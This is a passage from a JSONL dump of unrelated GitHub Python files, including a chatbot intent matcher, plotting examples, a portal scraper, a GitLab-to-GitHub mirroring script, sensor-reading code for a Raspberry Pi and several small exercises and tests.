'exit':['close','shut up','stop','exit']\r\n}\r\n\r\npatterns = {intent: re.compile('|'.join(keys)) for intent, keys in intent_keywords.items()}\r\n\r\ndef get_intent(message):\r\n intents=[]\r\n for intent, pattern in patterns.items():\r\n # Check if the pattern occurs in the message \r\n if pattern.search(message):\r\n intents.append(intent)\r\n if(len(intents)!=0):\r\n return intents\r\n else: \r\n return(['default']) \r\ndef ques_check(message):\r\n que = False\r\n for i in [\"when\",\"what\",\"why\",\"how\",\"who\",\"where\"]:\r\n if i in message:\r\n que = True\r\n return que","repo_name":"saai-sudarsanan-d/Alpha-v1","sub_path":"intent_keys.py","file_name":"intent_keys.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"12010348963","text":"\nimport matplotlib\n# Force matplotlib to not use any Xwindows backend.\nmatplotlib.use('Agg')\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.patches import Polygon\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg\nimport matplotlib.numerix as nx\n\nfigsize = (3,8)\ndpi = 80\n\nfrom matplotlib import mpl\nfig = Figure(figsize=figsize)\n \n#ax = fig.add_subplot(111)\n# Make a figure and axes with dimensions as desired.\n#fig = pyplot.figure(figsize=(8,3))\n#[left, bottom, width, height] \nax1 = fig.add_axes([0.05, 0.05, 0.15, 0.9])\nax2 = fig.add_axes([0.65, 0.05, 0.15, 0.9])\n\n# Set the colormap and norm to correspond to the data for which\n# the colorbar will be used.\ncmap = mpl.cm.cool\nnorm = mpl.colors.Normalize(vmin=5, vmax=10)\n\n# ColorbarBase derives from ScalarMappable and puts a colorbar\n# in a specified axes, so it has everything needed for a\n# standalone colorbar. There are many more kwargs, but the\n# following gives a basic continuous colorbar with ticks\n# and labels.\ncb1 = mpl.colorbar.ColorbarBase(ax1, cmap=cmap,\n norm=norm,\n orientation='vertical')\ncb1.set_label('Energies')\n\n# The second example illustrates the use of a ListedColormap, a\n# BoundaryNorm, and extended ends to show the \"over\" and \"under\"\n# value colors.\ncmap = mpl.colors.ListedColormap(['r', 'g', 'b', 'c'])\ncmap.set_over('0.25')\ncmap.set_under('0.75')\n\n# If a ListedColormap is used, the length of the bounds array must be\n# one greater than the length of the color list. The bounds must be\n# monotonically increasing.\nbounds = [1, 2, 4, 7, 8]\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N)\ncb2 = mpl.colorbar.ColorbarBase(ax2, cmap=cmap,\n norm=norm,\n # to use 'extend', you must\n # specify two extra boundaries:\n boundaries=[0]+bounds+[13],\n extend='both',\n ticks=bounds, # optional\n spacing='proportional',\n orientation='vertical')\ncb2.set_label('Discrete intervals, some other units')\n# Make the PNG\ncanvas = FigureCanvasAgg(fig)\n# The size * the dpi gives the final image size\n# a4\"x4\" image * 80 dpi ==> 320x320 pixel image\nfilename = \"/Users/ludo/mw_v_xlogp_ellipses.png\"\ncanvas.print_figure(filename, dpi=dpi)\n\n\nimport DejaVu\nDejaVu.enableVBO = False \nfrom DejaVu import Viewer\nvi = Viewer() \nfilename = \"/Users/ludo/mw_v_xlogp_ellipses.png\"\nfigsize = (3,8)\ndpi = 80\nimport upy\nhelper = upy.getHelperClass()(master=vi)\nplane = helper.plane(\"plotplane\",center=[0.,0.,0.],\n size=[dpi*figsize[0]/10.,dpi*figsize[1]/10.],\n subdivision=(1,1),axis=\"+Z\")#-Z c4d, Z maya\nmat = helper.createTexturedMaterial(\"plot\",filename)\nhelper.assignMaterial(plane,mat,texture=True)\n\n\n","repo_name":"corredD/upy","sub_path":"examples/testmatplotlib.py","file_name":"testmatplotlib.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"} +{"seq_id":"33055803274","text":"from .common import BeautifulSoup, to_csv, to_img\nfrom . import head, env\n\n\nclass Extractor:\n def __init__(self, auth):\n self.auth = auth\n\n def jadwal(self):\n res = self.auth.s.get(f\"{env['BASE_URL']}/{env['COURSE_URL']}\", headers=head)\n soup = BeautifulSoup(res.content, \"html.parser\")\n table = soup.find_all('table', class_='table table-hover table-striped')\n table = table[1]\n data = []\n rows = table.find_all('tr')[1:] \n for row in rows:\n columns = row.find_all('td')\n no = columns[0].text.strip().rstrip('.')\n hari_waktu = ' '.join(columns[1].text.split()).strip()\n kelas_ruangan = ' '.join(columns[2].text.split()).strip()\n mata_kuliah = ' '.join(columns[3].text.split()[1:]).strip()\n dosen = columns[4].text.strip()\n\n data.append({\n 'No': no,\n 'Hari & Waktu': hari_waktu,\n 'Kelas & Ruangan': kelas_ruangan,\n 'Mata Kuliah': mata_kuliah,\n 'Dosen Pengampuh': dosen\n })\n\n to_csv(data, \"jadwal.csv\")\n # to_img(\"jadwal.csv\", \"jadwal.png\")\n return True","repo_name":"rizmulya/mycic-absen","sub_path":"cic_portal/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8403771723","text":"#from mpl_toolkits.mplot3d import Axes3D\n#import matplotlib.pyplot as plt\nfrom math import *\nimport numpy as np \n\n\n\ndef main():\n \n \n eta = 0.00001\n iter = 10000\n #for j in range(1,8):\n \t#eta = eta*10\n \t#print(minimize_loss([-6,-6],eta, iter), eta, [ -6, -6]) #Task 1_2 \t\n print(minimize_loss([-6,-6],eta, iter), eta) #Task 1_2 \t\n return\n\n\n\ndef minimize_loss(w, eta,iter):\n\t#want to test all possible values of w[-6,-6]; update w_i\n\t# and minimize L_simple\n\t\n\tw_old = w\n\tvalue_arr = []\n\tfor i in range(1,iter):\n\t\tw_new = w_old - np.array([eta, eta])*d_L_simple([w_old[0], w_old[1]])\n\t\tw_old = w_new\n\t\tL_simpleval= L_simple([w_new[0],w_new[1]])\n\t\tvalue_arr.append(L_simpleval)\n\t\tif min(value_arr) == L_simpleval:\n\t\t\tw_minimize = [w_new[0], w_new[1]]\n\tplotL_simple(eta, value_arr)\n\treturn w_minimize\n\ndef logistic(w,x): \n return 1.0/(1.0+np.exp(-np.inner(w,x)))\n\ndef d_logistic(w,x,derivative):\n if derivative == 1:\n return x[0] * np.exp(-np.inner(w,x))*logistic(w, x)*logistic(w, x)\n if derivative == 2:\n return x[1] * np.exp(-np.inner(w,x))*logistic(w, x)*logistic(w, x)\n\ndef L_simple(w):\n return np.power(logistic(w, [1, 0]) -1, 2) + np.power(logistic(w, [0, 1]), 2) + np.power(logistic(w, [1, 1]) -1, 2)\n\ndef d_L_simple(w):\n #derivate of L_simple \n first_w1 = (logistic(w, [1, 0]) -1) * 2 * d_logistic(w, [1, 0], 1) \n second_w1 = (logistic(w, [0, 1])) * 2 * d_logistic(w, [0, 1], 1) \n third_w1 = (logistic(w, [1, 1]) -1) * 2 * d_logistic(w, [1, 1], 1) \n\n first_w2 = (logistic(w, [1, 0]) -1) * 2 * d_logistic(w, [1, 0], 2) \n second_w2 = (logistic(w, [0, 1])) * 2 * d_logistic(w, [0, 1], 2) \n third_w2 = (logistic(w, [1, 1]) -1) * 2 * d_logistic(w, [1, 1], 2) \n return [first_w1 + second_w1 + third_w1, first_w2 + second_w2 + third_w2]\n\ndef plotL_simple(eta, val_arr):\n\tfig = plt.figure() \n\tax = fig.gca(projection='3d')\n\n\t# Plot a sin curve using the x and y axes.\n\tx = np.linspace(0, 1, 100)\n\ty = np.sin(x * 2 * np.pi) / 2 + 0.5\n\tax.plot(x, y, zs=0, zdir='z', label='curve in (x,y)')\n\treturn\n\n\n\n\n\n\n\n\nif __name__== \"__main__\":\n main()\n\n","repo_name":"krislands/AI_oving4","sub_path":"AI_oving4/ai_4_testmedhenningsverdier.py","file_name":"ai_4_testmedhenningsverdier.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"9053153771","text":"# -*-coding: UTF-8 -*-\n#!/usr/bin/python\nnumero=int(input( \"Digame cuantas palabras tiene la lista: \"))\ncont = 0\nlista = []\nwhile cont < numero:\n print(\"Digame la palabra\", str(cont + 1) + \": \")\n nombre=input()\n lista+=[nombre]\n cont=cont+1\nprint(\"La lista creada es: \",lista)\nbuscar=str(input(\"Palabra a eliminar: \"))\nfor i in range(len(lista)-1, -1, -1):\n if lista[i] == buscar:\n del(lista[i])\n \nprint(\"La lista es ahora: \",lista)\n","repo_name":"JoanJSimpson/DesarrolloInterfaces","sub_path":"1a Evaluacion/Tema 1/Practicas/Ejercicio 1/Lista4.py","file_name":"Lista4.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"86284543719","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport sofia_redux.instruments.forcast.configuration as dripconfig\nfrom sofia_redux.instruments.forcast.setpar import setpar\n\n\nclass TestSetpar(object):\n\n def test_badparname(self, capsys):\n setpar(None, 'ok value')\n capt = capsys.readouterr()\n assert 'invalid parname' in capt.err\n\n def test_badvalue(self, capsys):\n setpar('foo', None)\n capt = capsys.readouterr()\n assert 'invalid parameter value' in capt.err\n\n def test_load_config(self):\n dripconfig.configuration = None\n setpar('foo', 'bar')\n assert dripconfig.configuration['foo'] == 'bar'\n\n def test_setpar(self):\n dripconfig.load()\n assert 'foo' not in dripconfig.configuration\n setpar('foo', 'bar')\n assert dripconfig.configuration['foo'] == 'bar'\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/instruments/forcast/tests/test_setpar.py","file_name":"test_setpar.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"31836418213","text":"from tensorflow import keras\nimport pickle\nimport tensorflow as tf\n\n\ntest_data = pickle.load(open('data/test_data.pkl', 'rb'))\ntest_labels = pickle.load(open('data/test_labels.pkl', 'rb'))\n\nnew_model = keras.models.load_model('model/1.h5')\nnew_model.summary()\n\nnew_model.compile(optimizer=tf.train.AdamOptimizer(),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\nloss, acc = new_model.evaluate(test_data, test_labels)\nprint(\"Restored model, accuracy: {:5.2f}%\".format(100*acc))\n","repo_name":"sunsyw/nlp","sub_path":"tf_classify/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"6943828109","text":"import requests\nimport json\nimport csv\nimport time\n\ndef does_github_repo_exist(access_token,org_name,repo_name):\n payload={}\n url = \"https://api.github.com/repos/\"+org_name+\"/\"+repo_name\n headers = {\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token '+access_token\n }\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code == 200:\n return True\n else:\n return False\n\ndef read_csv_file(data_file):\n return_array = []\n with open(data_file, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n line_count=line_count+1\n return_array.append(row)\n line_count = line_count+1\n return return_array\n\ndef add_remote(github_access_token, gitlab_access_token, mirror_object, github_username):\n url=\"https://gitlab.com/api/v4/projects/\"+mirror_object['GitLab Project ID']+\"/remote_mirrors?enabled=true\"\n payload = {\n \"url\":\"https://\"+github_username+\":\"+github_access_token+\"@github.com/\"+mirror_object['GitHub Org']+\"/\"+mirror_object['GitLab Project Name']+\".git\"\n }\n headers = {\n 'Private-Token': gitlab_access_token,\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code >=200 and response.status_code<300:\n return True\n else:\n print(\"Failed to map - \"+str(response.status_code))\n print(\"Response is \"+str(response.text))\n return False\n\ndef create_github_repo(github_access_token,mirror_object):\n url=\"https://api.github.com/orgs/\"+mirror_object['GitHub Org']+\"/repos\"\n #print(url)\n payload={}\n payload={\n \"name\":mirror_object['GitLab Project Name'],\n \"private\":\"true\"\n }\n headers = {\n 'Accept': 'application/vnd.github.v3+json',\n 'Authorization': 'token '+github_access_token\n }\n response = requests.request(\"POST\", url, headers=headers, json=payload)\n if response.status_code >= 200 or response.status_code<300:\n return True\n else:\n return False\n\ndef does_gitlab_mirror_exist(gitlab_access_token,mirror_object,github_username):\n url = \"https://gitlab.com/api/v4/projects/\"+mirror_object['GitLab Project ID']+\"/remote_mirrors\"\n payload={}\n headers = {\n 'Private-Token': gitlab_access_token,\n }\n github_repo = mirror_object['GitHub Org']+\"/\"+mirror_object['GitLab Project Name']+\".git\"\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n if response.status_code == 200:\n response_dict = json.loads(response.text)\n for i in response_dict:\n if github_repo.lower() in i['url'].lower() and i['enabled']:\n return True\n else:\n return False\n else:\n print(\"DEBUG: Error getting remote mirror details\"+str)\n\ncreds = read_csv_file(\"tokens.csv\").pop(0)\ngitlab_access_token = creds['GitLab Access Token']\ngithub_access_token = creds['GitHub Access Token']\ngithub_username = creds['GitHub Username']\ndata_objects=read_csv_file(\"data_file.csv\")\nfor i in data_objects:\n if does_github_repo_exist(github_access_token,i['GitHub Org'],i['GitLab Project Name']):\n i['GitHub exists'] = True\n i['repo-created'] = False\n if not does_gitlab_mirror_exist(gitlab_access_token,i,github_username):\n if add_remote(github_access_token,gitlab_access_token,i,github_username):\n i['add-remote'] = True\n print(\"Successfully added mapping for \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = False\n print(\"FAILED TO MAP - \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = \"Existed\"\n print(\"Mapping of GitLab: \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name'])+\" already exists! Skipping this!\")\n else:\n i['GitHub exists'] = False\n if create_github_repo(github_access_token,i):\n #time.sleep(5)\n i['repo-created'] = True\n if add_remote(github_access_token,gitlab_access_token,i,github_username):\n i['add-remote'] = True\n print(\"Successfully added mapping for \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['add-remote'] = False\n print(\"FAILED TO MAP - \"+str(i['GitLab Group Name'])+\"/\"+str(i['GitLab Project Name'])+\"---> GitHub:\"+str(i['GitHub Org'])+\"/\"+str(i['GitLab Project Name']))\n else:\n i['repo-created'] = False\n print(\"DEBUG: Error in creating the repo. Check the data_file.csv\")\n\n#Generate Mirroring report\nwith open('mirror_setup_details.csv', mode='w') as data_file: \n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(\n [\n 'GitLab Group ID', \n 'GitLab Group Name', \n 'GitLab Project ID', \n 'GitLab Project Name', \n 'GitHub Org', \n 'GitHub exists', \n 'repo-created', \n 'add-remote'\n ])\n\n for i in data_objects:\n data_writer.writerow(\n [\n i['GitLab Group ID'], \n i['GitLab Group Name'], \n i['GitLab Project ID'], \n i['GitLab Project Name'], \n i['GitHub Org'], \n i['GitHub exists'], \n i['repo-created'], \n i['add-remote']\n ])","repo_name":"sandesh2026/GitLab_mirroring_Python","sub_path":"2_mirror_setup.py","file_name":"2_mirror_setup.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27757321041","text":"with open('inputs/input-15.txt') as file:\n raw = file.read()\n\ndata = [int(i) for i in raw.split(',')]\n\ndef play(init: list[int], turns: int):\n \"\"\"\n Plays the memory game. Needs the init numbers and how many turns to play.\n \"\"\"\n hist = {k:i+1 for i,k in enumerate(init[:-1])} # number:last_turn (+1 for indexing)\n last = init[-1]\n \n for turn in range(len(init),turns):\n if last in hist:\n current = turn-hist[last]\n else:\n current = 0\n \n hist[last] = turn\n last = current\n \n return last\n\nprint(play(data,2020))\nprint(play(data,30000000))\n","repo_name":"thesadru/advent-of-code-2020","sub_path":"challenges/day-15.py","file_name":"day-15.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"41027265979","text":"#!/usr/bin/env python\n'''code description'''\n# pylint: disable = I0011, E0401, C0103, C0321\n\nclass Solution(object):\n '''Solution description'''\n def func(self, m, n, k):\n '''Solution function description'''\n res = []\n self.helper(res, [], 0, 0, 0, 0, 0, 0, m, n, k)\n return res\n def helper(self, total, part, counter1, counter2, counter3, round, square, flower, m, n, k):\n if counter1 < 0 or counter2 < 0 or counter3 < 0: return\n if counter1 > m or counter2 > n or counter3 > k: return\n if round > m or square > n or flower > k: return\n if part and len(part) > (m + n + k) * 2: return\n if part and len(part) == (m + n + k) * 2 and counter1 == 0 and counter2 == 0 and counter3 == 0 and\\\n round == m and square == n and flower == k:\n total.append(part)\n return\n self.helper(total, part+['('], counter1+1, counter2, counter3, round, square, flower, m, n, k)\n self.helper(total, part+[')'], counter1-1, counter2, counter3, round+1, square, flower, m, n, k)\n self.helper(total, part+['['], counter1, counter2+1, counter3, round, square, flower, m, n, k)\n self.helper(total, part+[']'], counter1, counter2-1, counter3, round, square+1, flower, m, n, k)\n self.helper(total, part+['{'], counter1, counter2, counter3+1, round, square, flower, m, n, k)\n self.helper(total, part+['}'], counter1, counter2, counter3-1, round, square, flower+1, m, n, k)\n\ndef main():\n '''main function'''\n _solution = Solution()\n inp = [(1, 1, 1)]\n for i in inp:\n for r in _solution.func(i[0], i[1], i[2]):\n print(r)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cerebrumaize/leetcode","sub_path":"generate.multi.parentheses/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6702699013","text":"# This file is part of vcc.py.\n\n# vcc.py is free software: you can redistribute it and/or modify it under the terms of the GNU General \n# Public License as published by the Free Software Foundation, either version 3 of the License, or (at \n# your option) any later version.\n\n# vcc.py is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the \n# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public \n# License for more details.\n\n# You should have received a copy of the GNU General Public License along with vcc.py. If not, see \n# . \n\n\nfrom pathlib import Path\nfrom typing import Any\nimport yaml\n\nfrom .readconf import parse\n\nclass Configs:\n def __init__(self) -> None:\n readconf_config_path = Path.home() / \".vcc-config\"\n yaml_config_path = Path.home() / \".vcc-config.yaml\"\n if readconf_config_path.exists():\n config_text = readconf_config_path.read_bytes().decode(errors=\"ignore\")\n self.config: dict[str, Any] = parse(config_text)\n else:\n config_text = yaml_config_path.read_bytes().decode(errors=\"ignore\")\n self.config = yaml.safe_load(config_text)\n plugins: str | list[str] = self.config.get(\"plugins\", \"\")\n if isinstance(plugins, str):\n self.plugin_list = plugins.split(\" \")\n else:\n self.plugin_list = plugins\n\n","repo_name":"3swordman/vcc.py","sub_path":"vcc_py/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"25851824565","text":"##### Introduction\n# This Python file takes the array that we organized in the previous \n# FCS_to_Array Python file to a .csv file for the logistic regression in R.\n\n##### Loading modules\nimport pickle\nimport openpyxl\n\n##### Loading data\nallData = pickle.load(open(\"allData.obj\", \"rb\"))\ncytof_files = allData[\"cytof_files\"]\nexpr_list = allData[\"expr_list\"]\n(_, n_cells, _, _) = expr_list.shape\nmarker_names = allData[\"marker_names\"]\nmarker_names.remove(\"Time\")\n\n##### Preparing .csv file\nwb = openpyxl.Workbook()\ndest_filename = \"data_unt_dox.csv\"\nws1 = wb.active\n\n##### Writing header into .csv file\nfor col in range(len(marker_names)):\n col = col + 1 # Starts at 1 and not 0\n _ = ws1.cell(column = col, row = 1, value = marker_names[col-1])\n_ = ws1.cell(column = col + 1, row = 1, value = \"dox_status\")\n\n##### Writing data into .csv file\nfor i in range(len(expr_list)):\n if (cytof_files[\"DOX_Ab\"][i]): dox_status = 1\n else: dox_status = 0\n for j in range(len(expr_list[0])):\n for k in range(len(expr_list[0][0])):\n col = k + 1 # Starts at 1 and not 0\n row = i*n_cells + j + 2 # Also starts at 1 and 1 more for header\n # print(i)\n # print(j)\n # print(k)\n _ = ws1.cell(column = col, row = row, value = expr_list[i][j][k][0])\n _ = ws1.cell(column = col + 1, row = row, value = dox_status)\n\nwb.save(filename = dest_filename)","repo_name":"lmcclurg2314/Deep_Learning_For_PLGA_Analysis","sub_path":"UNT_DOX/FCS_to_Array/Array_to_CSV.py","file_name":"Array_to_CSV.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"4787459455","text":"from typing import Any, Dict, Tuple, Union\n\nfrom gym import Env, Wrapper\nfrom gym.vector import VectorEnv\n\n__all__ = ['RemoveEmptyInfo']\n\n\nclass RemoveEmptyInfo(Wrapper):\n \"\"\"Environment wrapper that replaces all empty info dicts with the same empty dict instance to save memory. Since\n the same placeholder instance is used, you have to make sure that the returned info dict is not modified. Also\n works with vector environments.\n\n Arguments:\n env (gym.Env): The environment for which empty info dicts will be replaced with the same empty placeholder dict.\n \"\"\"\n\n def __init__(self, env: Env) -> None:\n super().__init__(env)\n self._is_vector = isinstance(env.unwrapped, VectorEnv)\n self._empty = {}\n\n def step(self, action: Any) -> Tuple[Any, Any, Any, Union[Dict[str, Any], Tuple[Dict[str, Any], ...]]]:\n observation, reward, terminal, info = super().step(action)\n if self._is_vector:\n info = tuple((self._empty if len(i) == 0 else i) for i in info)\n else:\n if len(info) == 0:\n info = self._empty\n return observation, reward, terminal, info\n","repo_name":"jrobine/smaller-world-models","sub_path":"rl/envs/remove_empty_info.py","file_name":"remove_empty_info.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"33289852104","text":"from os import system, name\nimport getpass\nimport os.path\n\n#Clear Function\ndef clear():\n #Windows\n if name == 'nt':\n _ = system('cls')\n #Posix\n else:\n _ = system('clear')\n print(\"\\n .================.\\n / \\\\\\n* CYPHER *\\n \\\\ /\\n '================'\\n\")\n \n\n#Main Menu\ndef menu(sf,key,l):\n clear()\n i=int(input(\"\\n1) Add Credentials\\n2) Show Credentials\\n0) Exit\\n\\n-> \"))\n #Credentional Adder\n if i==1:\n adder(sf,key,l)\n #Show Credentials\n elif i==2:\n looker(sf,key,l)\n #Quit Program\n elif i==0:\n clear()\n print('Exiting...\\n')\n quit()\n #Loop Menu\n else:\n menu(sf,key,l)\n\n#Check Authentication Method\ndef checklog(sf,key,tch,l,cr):\n #Login Authenticator Key\n j=0\n check=''\n #Encrypt Login Key\n for d in tch:\n h=ord(d)+(int(key[j])*(int(key[j])+1))\n if h>126:\n h-=94\n check+=chr(h)\n j+=1\n if j==l:\n j=0\n #Check if Profile exists\n if os.path.isfile(sf) and cr==2:\n f = open(sf,'r')\n f.seek(0)\n c=f.readline()\n j=0\n m=''\n #Decrypt Profile Login Key\n for d in c:\n h=ord(d)-(int(key[j])*(int(key[j])+1))\n if h<32:\n h+=94\n m+=chr(h)\n j+=1\n if j==l:\n j=0\n f.close()\n #Verify Login\n if m[:-1]==tch:\n menu(sf,key,l)\n #Wrong Login\n else:\n clear()\n print('Wrong Password!\\n')\n quit()\n #Create new user Profile\n elif cr == 1 and not(os.path.isfile(sf)):\n f = open(sf,'w')\n f.write(check)\n f.write('\\n')\n f.close()\n menu(sf,key,l)\n elif cr==1:\n clear()\n print(\"User already exists!\")\n input()\n start()\n elif cr==2:\n clear()\n print(\"User doesn't exist!\")\n input()\n start()\n\n#Add new Credentials to user Profile\ndef adder(sf,key,l):\n clear()\n j=0\n #Get New Credentials\n f = open(sf,'a')\n name = input(\"\\nLogin: \")\n secret = getpass.getpass(\"Password: \")\n note = input(\"Note: \")\n tcrp=name+' : '+secret+' ('+note+')'\n c=''\n #Credential Encoder\n for d in tcrp:\n h=ord(d)+(int(key[j])*(int(key[j])+1))\n if h>126:\n h-=94\n c+=chr(h)\n j+=1\n if j==l:\n j=0\n c+='\\n'\n #Save Credentials to File\n f.write(c)\n f.close()\n menu(sf,key,l)\n\n#Look up the Profile Credentials\ndef looker(sf,key,l):\n clear()\n f = open(sf,'r')\n #Credentional Decoder\n for c in f:\n j=0\n m=''\n for d in c:\n h=ord(d)-(int(key[j])*(int(key[j])+1))\n if h<32:\n h+=94\n m+=chr(h)\n j+=1\n if j==l:\n j=0\n #Show Credential\n print(m[:-1])\n getpass.getpass('')\n f.close()\n menu(sf,key,l)\n\n\n#Login Menu\ndef start():\n clear()\n while True:\n cr = int(input(\"\\n1) Create User\\n2) LogIn\\n0) Exit\\n\\n-> \"))\n #Credentional Adder\n if cr == 1 or cr == 2:\n break;\n #Quit Program\n elif cr == 0:\n clear()\n print('Exiting...\\n')\n quit()\n login(cr)\n\ndef login(cr): \n clear()\n #Get User Login Info\n usr = list(input(\"User: \"))\n us=''.join(usr)\n pss = list(getpass.getpass(\"Password: \"))\n ps=''.join(pss)\n keyl=[]\n \n #Profile Key Generation Process\n while True:\n try:\n keyl.append(usr.pop(0))\n keyl.append(pss.pop(0))\n except IndexError:\n if len(usr)>0:\n keyl.append(usr.pop(0))\n elif len(pss)>0:\n keyl.append(pss.pop(0))\n else:\n break\n key=''.join(keyl)\n key=''.join(str(ord(c)) for c in key)\n l=len(key)\n \n #Profile file location\n sf='./Profiles/.'+us+'.txt'\n tch=us+' : '+ps+' (Cypher)'\n\n checklog(sf,key,tch,l,cr)\n\n#Program Start\nstart()\n","repo_name":"RicAlvesO/cypher-pe","sub_path":"cype.py","file_name":"cype.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71158975911","text":"import time\nimport string\nimport operator\nimport RPi.GPIO as GPIO\nimport serial\nfrom smbus import SMBus\n\nREAD_RATE = 1.0\n\n#For I2C\nREAD = 0x0\nI2C = 0x1\nCAL = 0x2\nI = 0x3\n\nDO_DATA_MAX_LENGTH=20\nDO_TERMINATOR = 255\nDO_ADDR = 0x63\nbus = SMBus(1)\n\n#For RS485 (UART)\nBAUD_RATE = 22800\nBRIX_DATA_LENGTH=13\nBRIX_ADDR = 0x01\nCRC_L = 0x44 \nCRC_H = 0x0C\nREAD_CMD = [chr(BRIX_ADDR), chr(0x03), chr(0x00),chr(0x00), chr(0x00), chr(0x08), chr(CRC_L), chr(CRC_H)]\nREAD_CMD_STR = ''.join(READ_CMD)\nser = serial.Serial('/dev/serial0',BAUD_RATE, timeout=1)\n\nclass Master :\n def __init__(self):\n self.DATA = {'DO': '', 'BRIX_TEMP': '', 'BRIX_BRIX' : '' }\n \n def readDO(self):\n res=\"\"\n data=\"\"\n data = bus.read_i2c_block_data(DO_ADDR, READ, DO_DATA_MAX_LENGTH)\n \n for i in range(len(data)):\n if i==0:\n print(\"DO Response Code is %d\" % int(data[i]))\n continue\n tmp = chr(data[i])\n if ord(tmp) ==DO_TERMINATOR: \n break\n res += tmp\n self.DATA['DO'] = res\n\n def readBRIX(self):\n ser.write(READ_CMD_STR)\n data = []\n \n for i in range(BRIX_DATA_LENGTH):\n tmp = ser.read(1)\n try :\n data.append(ord(tmp))\n except :\n data.append(0)\n \n # Temperature\n tmp = data[3]\n for i in range(3):\n tmp = tmp << 4\n tmp = data[i+4]\n self.DATA['BRIX_TEMP']= \"%f\" % tmp\n \n # Brix\n tmp = data[7]\n for i in range(3):\n tmp = tmp << 4\n tmp = data[i+8]\n self.DATA['BRIX_BRIX'] = \"%f\" % tmp\n\n def getAllData(self):\n self.readDO()\n self.readBRIX()\n\n for k in sorted(self.DATA.keys()) :\n print(\"%s = %s\" % ( k , self.DATA[k] ))\n print(\"\")\n\n #For Next Test\n def sendAllData(self):\n pass\n\ndef main():\n READ_RATE = 1.0 \n master = Master() \n \n print(\"1. Read\")\n print(\"2. Rate\")\n print(\"3. Cal\")\n print(\"4. Quit\")\n \n\n while True :\n cmd = raw_input(\"Command : \")\n\n if cmd == \"Read\" :\n print(\"Start Reading\")\n print(\"Read Rate is %d\" % READ_RATE)\n\n while True:\n try :\n master.getAllData()\n time.sleep(READ_RATE)\n except KeyboardInterrupt :\n print(\"Stop reading\")\n break\n\n elif cmd == \"Rate\" :\n try:\n READ_RATE = float(raw_input('Enter new Read Rate '))\n except ValueError:\n print('Invalid Read Rate')\n \n elif cmd == \"Cal\" :\n pass\n elif cmd == \"Quit\" :\n break\n\nif __name__ == '__main__' :\n main()\n","repo_name":"ina-uzu/RPi_TEST","sub_path":"MULT/CASE1.py","file_name":"CASE1.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5995126799","text":"from django.urls import reverse\n\nfrom mixer.backend.django import mixer\n\nfrom articles.models import Author, Article\nfrom blog.tests import BaseTest\n\n\nclass TestArticleListView(BaseTest):\n\n def setUp(self) -> None:\n author = mixer.blend(Author)\n self.article = mixer.blend(Article, author=author)\n self.create_and_login(\"test@test.com\", \"test\")\n\n def 